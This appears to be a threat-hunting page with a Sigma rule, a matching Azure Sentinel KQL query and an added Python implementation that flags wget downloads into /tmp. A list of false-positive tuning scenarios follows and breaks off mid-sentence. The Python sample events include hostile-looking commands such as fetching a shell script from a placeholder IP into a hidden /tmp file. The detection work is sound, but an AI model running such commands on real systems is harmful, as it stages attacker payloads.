Adversaries may use wget to download malicious files into suspicious directories to establish persistence or execute payloads. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential command and control or data exfiltration activities early.
Detection Rule
title: Download File To Potentially Suspicious Directory Via Wget
id: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4
status: test
description: Detects the use of wget to download content to a suspicious directory
references:
    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/wget'
    selection_output:
        - CommandLine|re: '\s-O\s' # We use regex to ensure a case sensitive argument detection
        - CommandLine|contains: '--output-document'
    selection_path:
        CommandLine|contains: '/tmp/'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
imProcessCreate
| where TargetProcessName endswith "/wget" and (TargetProcessCommandLine matches regex "\\s-O\\s" or TargetProcessCommandLine contains "--output-document") and TargetProcessCommandLine contains "/tmp/"
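As an added example (not part of the original rule or the author's work), the three Sigma selections above implemented in Python and run over constructed process-creation events, followed by a known-source allowlist of the kind the tuning scenarios below describe. The hostnames, IP address and user names are constructed for the example.

```python
import re
from dataclasses import dataclass

# Sigma logic: Image endswith '/wget', CommandLine matches '\s-O\s' (case sensitive:
# lowercase -o is wget's log-file option) or contains '--output-document', and
# CommandLine contains '/tmp/'. All three selections must hold.
OUTPUT_FLAG_RE = re.compile(r"\s-O\s")

# Constructed allowlist in the spirit of the tuning scenarios (example hosts only).
KNOWN_SOURCES = ("https://updates.example.com/", "https://config.example.com/")


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    user: str = ""


def matches_rule(ev: ProcessEvent) -> bool:
    """True when the event satisfies selection_img, selection_output and selection_path."""
    if not ev.image.endswith("/wget"):
        return False
    has_output_flag = bool(OUTPUT_FLAG_RE.search(ev.command_line)) or "--output-document" in ev.command_line
    return has_output_flag and "/tmp/" in ev.command_line


def is_known_source(command_line: str) -> bool:
    """Tuning step: drop hits whose URL points at an allowlisted internal server."""
    return any(src in command_line for src in KNOWN_SOURCES)


def hunt(events):
    """Apply the rule, then the allowlist; return the events that still warrant triage."""
    return [ev for ev in events if matches_rule(ev) and not is_known_source(ev.command_line)]


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ProcessEvent("/usr/bin/wget", "wget http://198.51.100.7/x.sh -O /tmp/.x", "www-data"),
    ProcessEvent("/usr/bin/wget", "wget --output-document=/tmp/update.bin https://updates.example.com/pkg.bin", "root"),
    ProcessEvent("/usr/bin/wget", "wget http://198.51.100.7/x.sh -o /tmp/wget.log", "www-data"),  # -o: log file, no hit
    ProcessEvent("/usr/bin/curl", "curl -o /tmp/x http://198.51.100.7/x.sh", "www-data"),  # not wget
    ProcessEvent("/usr/bin/wget", "wget -O /home/dev/tool.tgz https://example.org/tool.tgz", "dev"),  # not /tmp/
]

if __name__ == "__main__":
    for ev in hunt(SAMPLE_EVENTS):
        print(f"ALERT user={ev.user} cmd={ev.command_line}")
```

Only the first event survives: the second matches the rule but is dropped by the allowlist, and the third shows why the rule's regex is case sensitive.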
Scenario: System Update via Wget
Description: A system administrator uses wget to download a critical system update package to a temporary directory before installing it.
Filter/Exclusion: Exclude wget commands where the destination directory is /tmp or /var/tmp and the URL matches a known update server (e.g., https://updates.example.com).
Scenario: Scheduled Job for Data Backup
Description: A scheduled job uses wget to fetch a backup file from an internal server to a directory used for temporary storage during the backup process.
Filter/Exclusion: Exclude wget commands executed by the backup user or cron jobs with a specific job name (e.g., backup_job) and destination directory /var/backups.
Scenario: Admin Task for Configuration Sync
Description: An admin uses wget to download a configuration file from a central configuration management server to a directory used for staging changes before applying them.
Filter/Exclusion: Exclude wget commands executed by the admin user or with a destination directory /opt/config-staging and URL matching a known config server (e.g., https://config.example.com).
Scenario: Log File Aggregation
Description: A log aggregation tool uses wget to download log files from a remote server to a temporary directory for processing.
Filter/Exclusion: Exclude wget commands where the destination directory is /var/log/aggregate and the URL is from a known internal log server (e.g., http://logserver.example.com).
Scenario: Software Development Build Process
Description: A CI/CD pipeline uses wget to download a dependency or artifact to a build directory during the compilation process.
Filter/Exclusion: Exclude wget commands executed by